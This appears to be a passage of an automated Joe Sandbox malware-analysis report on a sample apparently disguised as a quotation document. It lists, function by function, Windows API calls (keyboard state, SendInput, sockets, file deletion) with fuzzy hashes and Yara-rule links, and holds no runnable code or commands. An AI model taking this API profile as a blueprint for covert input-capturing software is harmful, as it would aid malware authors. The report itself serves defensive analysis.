                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0015471A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                      • String ID: msctls_updown32
                                                                                      • API String ID: 4014797782-2298589950
                                                                                      • Opcode ID: 4c31d95b911a3ce46d5df0eeb5b4ea630a0cbd6238381749c004429b2ececc5c
                                                                                      • Instruction ID: aa443d9501adfe21d493926a497dd7507c36f0f4683adc80a7ffe76e66c93316
                                                                                      • Opcode Fuzzy Hash: 4c31d95b911a3ce46d5df0eeb5b4ea630a0cbd6238381749c004429b2ececc5c
                                                                                      • Instruction Fuzzy Hash: 0F219DB5600209EFEB11DF64DCC1DAB37ADEB5A3A9B000059FA109B391CB31EC95CB60
                                                                                      Function 001537B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00153840
                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00153850
                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00153876
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$MoveWindow
                                                                                      • String ID: Listbox
                                                                                      • API String ID: 3315199576-2633736733
                                                                                      • Opcode ID: d1671245cb824bf490c8afab56ad8b7710bcdec5de20ac3349efe6b1bede9d79
                                                                                      • Instruction ID: 574e02928c6f4db7d5f51248f384777508bc7868c7f975050815be77ba51897d
                                                                                      • Opcode Fuzzy Hash: d1671245cb824bf490c8afab56ad8b7710bcdec5de20ac3349efe6b1bede9d79
                                                                                      • Instruction Fuzzy Hash: FB21B072600218BFEB218F64CC81FAB376AEF89791F108114F9209B190C771DC568BA0
                                                                                      Function 001349F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00134A08
                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00134A5C
                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,0015CC08), ref: 00134AD0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                      • String ID: %lu
                                                                                      • API String ID: 2507767853-685833217
                                                                                      • Opcode ID: b09b3d08d788e1d9d50b8ab80ab044b1be05803fe5b3f1472d7a3839fa313a05
                                                                                      • Instruction ID: 0e5db63174e46a988f02dcb8bfa8abe603817a94f7101d25dcce764a3d2a8685
                                                                                      • Opcode Fuzzy Hash: b09b3d08d788e1d9d50b8ab80ab044b1be05803fe5b3f1472d7a3839fa313a05
                                                                                      • Instruction Fuzzy Hash: D4310F75A00209AFDB10DF54C985EAE7BF8EF05308F148099F909DB252D775ED45CBA1
                                                                                      Function 001541EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0015424F
                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00154264
                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00154271
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: msctls_trackbar32
                                                                                      • API String ID: 3850602802-1010561917
                                                                                      • Opcode ID: fb6870eb4be131d63185a13d7aaef574b1b18b731b0d4fee5848c548c3c34228
                                                                                      • Instruction ID: 5b6f855c76627bf5a90325cf00ac2cd44854ade436af67b35a9d4144a8241623
                                                                                      • Opcode Fuzzy Hash: fb6870eb4be131d63185a13d7aaef574b1b18b731b0d4fee5848c548c3c34228
                                                                                      • Instruction Fuzzy Hash: CB11E331240208BFEF205F29DC46FAB3BACEF95B59F110114FA65EA090D371D8919B20
                                                                                      Function 00122F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00122DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00122DC5
                                                                                        • Part of subcall function 00122DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00122DD6
                                                                                        • Part of subcall function 00122DA7: GetCurrentThreadId.KERNEL32 ref: 00122DDD
                                                                                        • Part of subcall function 00122DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00122DE4
                                                                                      • GetFocus.USER32 ref: 00122F78
                                                                                        • Part of subcall function 00122DEE: GetParent.USER32(00000000), ref: 00122DF9
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00122FC3
                                                                                      • EnumChildWindows.USER32(?,0012303B), ref: 00122FEB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
                                                                                      • String ID: %s%d
                                                                                      • API String ID: 2776554818-1110647743
                                                                                      • Opcode ID: 136d2123c2a548f9963da30c590a623b0fff2486d091bb46ef6446261c4c9e76
                                                                                      • Instruction ID: 29ee919053ab3be76429d9a3aef2dd747c3e7158eaece97f74d3d6217bae698d
                                                                                      • Opcode Fuzzy Hash: 136d2123c2a548f9963da30c590a623b0fff2486d091bb46ef6446261c4c9e76
                                                                                      • Instruction Fuzzy Hash: B511E471200319ABCF14BFB09C95EEE37AAAF94304F044079F9199B252DF349A598B70
                                                                                      Function 00155882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001558C1
                                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001558EE
                                                                                      • DrawMenuBar.USER32(?), ref: 001558FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$InfoItem$Draw
                                                                                      • String ID: 0
                                                                                      • API String ID: 3227129158-4108050209
                                                                                      • Opcode ID: 00aae7e50cd74c8f4ecd0bccd343fba993b2da98e61c0afb2d9ac2ffc2bcef55
                                                                                      • Instruction ID: 7d0618f89a3d9d2315dbd96690bdd18838041d9f533b5ef3c993916515b91bcb
                                                                                      • Opcode Fuzzy Hash: 00aae7e50cd74c8f4ecd0bccd343fba993b2da98e61c0afb2d9ac2ffc2bcef55
                                                                                      • Instruction Fuzzy Hash: 6B016131500318EFDB119F51DC44BAEBBB5FB45366F108099E859DA261EB348A84DF71
                                                                                      Function 0011D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0011D3BF
                                                                                      • FreeLibrary.KERNEL32 ref: 0011D3E5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeLibraryProc
                                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                                      • API String ID: 3013587201-2590602151
                                                                                      • Opcode ID: 67a9246ead4631ef90ec1755aafb41c8aa3cf42b837e57bbe9d318bdab56b602
                                                                                      • Instruction ID: 843111912f1cd98d8e6a3c2ae258016f35b64ec2cf95ae0fd5d02685cc91741b
                                                                                      • Opcode Fuzzy Hash: 67a9246ead4631ef90ec1755aafb41c8aa3cf42b837e57bbe9d318bdab56b602
                                                                                      • Instruction Fuzzy Hash: D0F0ECB5415B11DAD77C56109CC89E93314BF11711F658177E033F5095EB70C9C1C692
                                                                                      Function 0012007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fa20f8bdc32a29c9d9bf954c5b369f69decf51bbd6bfbc091d69c41e32cf6e24
                                                                                      • Instruction ID: 140dc9c4427a502f4f04f1e133e49f68c32d01f4728729ef2b451d28bd17b72d
                                                                                      • Opcode Fuzzy Hash: fa20f8bdc32a29c9d9bf954c5b369f69decf51bbd6bfbc091d69c41e32cf6e24
                                                                                      • Instruction Fuzzy Hash: A4C18D75A0022AEFDB05CFA4D894EAEB7B5FF48304F118698E405EB252C731ED91CB90
                                                                                      Function 0014342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 1998397398-0
                                                                                      • Opcode ID: 78ee8f390357db302fcbb92903cc392618d6c991ab253639aae04b7d9006d7ba
                                                                                      • Instruction ID: d4f2990d62423e16dbac07b43c11ac4cb43829ad6fffd25b553ebb2a4d181417
                                                                                      • Opcode Fuzzy Hash: 78ee8f390357db302fcbb92903cc392618d6c991ab253639aae04b7d9006d7ba
                                                                                      • Instruction Fuzzy Hash: D9A112756047019FCB00DF28C585A6EB7E5EF88724F05885DF99A9B362DB70EE01CB92
                                                                                      Function 00156278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowRect.USER32(00A8EBD0,?), ref: 001562E2
                                                                                      • ScreenToClient.USER32(?,?), ref: 00156315
                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00156382
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                      • String ID:
                                                                                      • API String ID: 3880355969-0
                                                                                      • Opcode ID: cf7aa37cb3f36a3621df46b684cd979d749c9ad3f7c6f0e9666e4e1bdbb2282b
                                                                                      • Instruction ID: e32eddbc66bb03d23f336c6588e703a1f37e9a81fea50f6ac3c6e529ce3953c8
                                                                                      • Opcode Fuzzy Hash: cf7aa37cb3f36a3621df46b684cd979d749c9ad3f7c6f0e9666e4e1bdbb2282b
                                                                                      • Instruction Fuzzy Hash: 2E513D74A00209EFCF10DF68D881AAE7BB5FF55365F508169F8699B2A0D730ED85CB90
                                                                                      Function 00141AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00141AFD
                                                                                      • WSAGetLastError.WSOCK32 ref: 00141B0B
                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00141B8A
                                                                                      • WSAGetLastError.WSOCK32 ref: 00141B94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$socket
                                                                                      • String ID:
                                                                                      • API String ID: 1881357543-0
                                                                                      • Opcode ID: 7350b13cb3838a38fa756adafc7d80cc4e35aafcf22c63578a73d96a285850cc
                                                                                      • Instruction ID: de808eca79781f852cb17f6ae37c76e9c7391132097e6627b5667ae5bd318dd0
                                                                                      • Opcode Fuzzy Hash: 7350b13cb3838a38fa756adafc7d80cc4e35aafcf22c63578a73d96a285850cc
                                                                                      • Instruction Fuzzy Hash: EF417B74600300AFE720AF24C886F6A77A5EB44718F54849CF91A9F7D3D772ED828B90
                                                                                      Function 001356D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00135783
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 001357A9
                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001357CE
                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001357FA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 3321077145-0
                                                                                      • Opcode ID: 37ca6e10bf80499cccb6ec8d1b68318515751ad0cf7393dc171c95a95453a5bf
                                                                                      • Instruction ID: cb0e92969092b4d44ad96ee3edcce2164422ffc7cbc21b11be961ed8967da12c
                                                                                      • Opcode Fuzzy Hash: 37ca6e10bf80499cccb6ec8d1b68318515751ad0cf7393dc171c95a95453a5bf
                                                                                      • Instruction Fuzzy Hash: BF411739600A10DFCB11EF15C445A5EBBE2EF89720F598498E84AAB362CB70FD41DF91
                                                                                      Function 001552C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00155352
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00155375
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00155382
                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001553A8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 3340791633-0
                                                                                      • Opcode ID: 54f38615145cc719df36c6efe18e0f95a45c8edd91cb99ee773a10ef868928b9
                                                                                      • Instruction ID: e78f15492936e14a999a339069147b8eb0fa61a4856b8523ca8560d0f9d27364
                                                                                      • Opcode Fuzzy Hash: 54f38615145cc719df36c6efe18e0f95a45c8edd91cb99ee773a10ef868928b9
                                                                                      • Instruction Fuzzy Hash: 6631B434A55A08EFEB749F14CC25BE83767BB043D2F584112FE299E2E1C7B09988D741
                                                                                      Function 0012AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?,753CA2E0,?,00008000), ref: 0012ABF1
                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 0012AC0D
                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 0012AC74
                                                                                      • SendInput.USER32(00000001,?,0000001C,753CA2E0,?,00008000), ref: 0012ACC6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                      • String ID:
                                                                                      • API String ID: 432972143-0
                                                                                      • Opcode ID: e275dc8c3266b06bc4737ba39e0e89b6846a6ac07d4d248c82eb9b94ccf5461b
                                                                                      • Instruction ID: f4af0d687ffba7f4fffba653c7e76c2b9bd81ed11d6b7b080cb0c1110595987c
                                                                                      • Opcode Fuzzy Hash: e275dc8c3266b06bc4737ba39e0e89b6846a6ac07d4d248c82eb9b94ccf5461b
                                                                                      • Instruction Fuzzy Hash: FB312830A04328AFFF38CF64EC047FE7BA5AF85310F84421AE481562D1C3749AB58792
                                                                                      Function 00157674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ClientToScreen.USER32(?,?), ref: 0015769A
                                                                                      • GetWindowRect.USER32(?,?), ref: 00157710
                                                                                      • PtInRect.USER32(?,?,00158B89), ref: 00157720
                                                                                      • MessageBeep.USER32(00000000), ref: 0015778C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1352109105-0
                                                                                      • Opcode ID: 7f46257fa5d0b57ed5d4011eb64d81bcc205696a05a9053bbf202423a061e4d2
                                                                                      • Instruction ID: 7735b5eb68cd4792f07715b995a37310c8838926209ed6c65e6301c6f1348354
                                                                                      • Opcode Fuzzy Hash: 7f46257fa5d0b57ed5d4011eb64d81bcc205696a05a9053bbf202423a061e4d2
                                                                                      • Instruction Fuzzy Hash: 5841AF34605255EFCB02CF58E89AEA977F4FB49306F1540A9E8249F2A1C330A989CF90
                                                                                      Function 001516DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32 ref: 001516EB
                                                                                        • Part of subcall function 00123A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00123A57
                                                                                        • Part of subcall function 00123A3D: GetCurrentThreadId.KERNEL32 ref: 00123A5E
                                                                                        • Part of subcall function 00123A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001225B3), ref: 00123A65
                                                                                      • GetCaretPos.USER32(?), ref: 001516FF
                                                                                      • ClientToScreen.USER32(00000000,?), ref: 0015174C
                                                                                      • GetForegroundWindow.USER32 ref: 00151752
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
